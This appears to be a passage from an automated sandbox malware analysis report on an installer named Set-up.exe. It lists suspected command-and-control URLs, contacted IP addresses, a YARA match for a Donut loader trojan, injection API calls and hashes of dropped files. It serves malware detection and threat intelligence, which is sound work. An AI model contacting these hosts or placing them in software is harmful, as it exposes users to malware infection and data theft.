              Source: Set-up.exe, 00000000.00000003.2245407143.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2246639052.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256757804.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256424330.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2240577276.000000000395E000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2243028644.00000000038A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2253316872.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2257864056.00000000038FE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2255372655.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2240400232.0000000003884000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2257576660.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2241234626.0000000003886000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2258990958.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2254270801.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2241369142.000000000395B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2254967557.00000000037B3000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2238320059.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2254530724.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256105330.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2255517886.00000000037BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2256263442.00000000037B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: Set-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312625508.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2301046960.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/Lm
              Source: Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Set-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312557136.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtt
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2194970895.000000000353A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/
              Source: Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/--
              Source: Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2173940500.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174288204.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api
              Source: Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api)
              Source: Set-up.exe, 00000000.00000003.2131714421.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/api.
              Source: Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apib
              Source: Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apis
              Source: Set-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184622292.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apite
              Source: Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/apiy
              Source: Set-up.exe, 00000000.00000003.2215853185.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312625508.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2301046960.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/c
              Source: Set-up.exe, 00000000.00000003.2184587220.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195003409.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://laborersquei.click/lm
              Source: Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Set-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49720 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Sample or dropped binary is a compiled AutoHotkey binary
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006CE421 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_006CE421
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040AC8A: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,0_2_0040AC8A
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00452F000_2_00452F00
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004680700_2_00468070
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004601100_2_00460110
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004484C00_2_004484C0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004185FE0_2_004185FE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0044C8600_2_0044C860
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00450B800_2_00450B80
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00434C220_2_00434C22
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00458D700_2_00458D70
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00454D700_2_00454D70
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00430F980_2_00430F98
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004610780_2_00461078
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004510000_2_00451000
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004491F00_2_004491F0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004593B00_2_004593B0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004514A00_2_004514A0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004415D20_2_004415D2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0042D8F70_2_0042D8F7
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00421AA20_2_00421AA2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0045A0B00_2_0045A0B0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0044A1500_2_0044A150
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004621700_2_00462170
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0045A1C00_2_0045A1C0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0044E2600_2_0044E260
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004462D00_2_004462D0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0045E3000_2_0045E300
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004724530_2_00472453
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0044A4F00_2_0044A4F0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004725E00_2_004725E0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004466900_2_00446690
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004726BB0_2_004726BB
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046A7000_2_0046A700
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046A8C00_2_0046A8C0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00456A800_2_00456A80
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406C930_2_00406C93
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0045ECA00_2_0045ECA0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046ADB00_2_0046ADB0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00446E400_2_00446E40
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00452EC00_2_00452EC0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046EE940_2_0046EE94
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00456F200_2_00456F20
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004670B00_2_004670B0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004032C90_2_004032C9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004674A00_2_004674A0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004676A00_2_004676A0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004539900_2_00453990
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00467A500_2_00467A50
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00427B6F0_2_00427B6F
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0044BD000_2_0044BD00
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00453ED00_2_00453ED0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00443FE00_2_00443FE0
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006804610_2_00680461
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006CE4210_2_006CE421
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069E16D0_2_0069E16D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006C017E0_2_006C017E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069C1EE0_2_0069C1EE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B227D0_2_006B227D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068C23E0_2_0068C23E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A429E0_2_006A429E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AA3020_2_006AA302
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006C046E0_2_006C046E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069C4340_2_0069C434
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A25070_2_006A2507
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068651E0_2_0068651E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006985F90_2_006985F9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AE5CA0_2_006AE5CA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A85AE0_2_006A85AE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068A68E0_2_0068A68E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006C07BE0_2_006C07BE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006BC79E0_2_006BC79E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006928490_2_00692849
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068480E0_2_0068480E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AE8050_2_006AE805
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B48AE0_2_006B48AE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B897E0_2_006B897E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A49E30_2_006A49E3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068A9AE0_2_0068A9AE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006969B50_2_006969B5
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AEA280_2_006AEA28
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006C0B3E0_2_006C0B3E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00698B3B0_2_00698B3B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B8BDE0_2_006B8BDE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B0B8C0_2_006B0B8C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006ACCCE0_2_006ACCCE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00688CDE0_2_00688CDE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A0CAE0_2_006A0CAE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069EC9E0_2_0069EC9E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069AD9E0_2_0069AD9E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00696E2D0_2_00696E2D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068AE2E0_2_0068AE2E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006ACEDE0_2_006ACEDE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AEEA70_2_006AEEA7
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00690E8D0_2_00690E8D
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069EF5E0_2_0069EF5E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AEF570_2_006AEF57
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A4FA50_2_006A4FA5
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AEFBB0_2_006AEFBB
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B904E0_2_006B904E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006BD04E0_2_006BD04E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006930A40_2_006930A4
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B919E0_2_006B919E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B324E0_2_006B324E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068523E0_2_0068523E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068720E0_2_0068720E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069D2FA0_2_0069D2FA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B72D30_2_006B72D3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069F36E0_2_0069F36E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069340E0_2_0069340E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B94BE0_2_006B94BE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006BF56E0_2_006BF56E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069D6510_2_0069D651
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006876CE0_2_006876CE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A36AE0_2_006A36AE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A56BE0_2_006A56BE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069770E0_2_0069770E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069F78E0_2_0069F78E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00687A6E0_2_00687A6E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069FA4E0_2_0069FA4E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00699A340_2_00699A34
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006ADAE30_2_006ADAE3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006AFAFE0_2_006AFAFE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006ADB2C0_2_006ADB2C
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00685BEE0_2_00685BEE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00697CD60_2_00697CD6
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A1C820_2_006A1C82
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069DDE20_2_0069DDE2
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00687EFE0_2_00687EFE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B1EA50_2_006B1EA5
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069BE8E0_2_0069BE8E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B9F7E0_2_006B9F7E
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B3F730_2_006B3F73
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006B7F480_2_006B7F48
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0068FFFE0_2_0068FFFE
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0068983E appears 78 times
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0069586E appears 75 times
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0046BB5C appears 646 times
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 004070BB appears 181 times
              Source: Set-up.exeStatic PE information: invalid certificate
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.drStatic PE information: Number of sections : 11 > 10
              Source: 9ONHJ3I0NWFBK4Q0S62.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.drStatic PE information: Number of sections : 11 > 10
              Source: Set-up.exe, 00000000.00000003.2253840335.000000000385E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2245156972.0000000003A52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2257864056.00000000039A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2255137670.0000000003977000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2256424330.000000000399F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2244620958.000000000394D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2257352751.0000000003AE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2254660075.0000000003856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
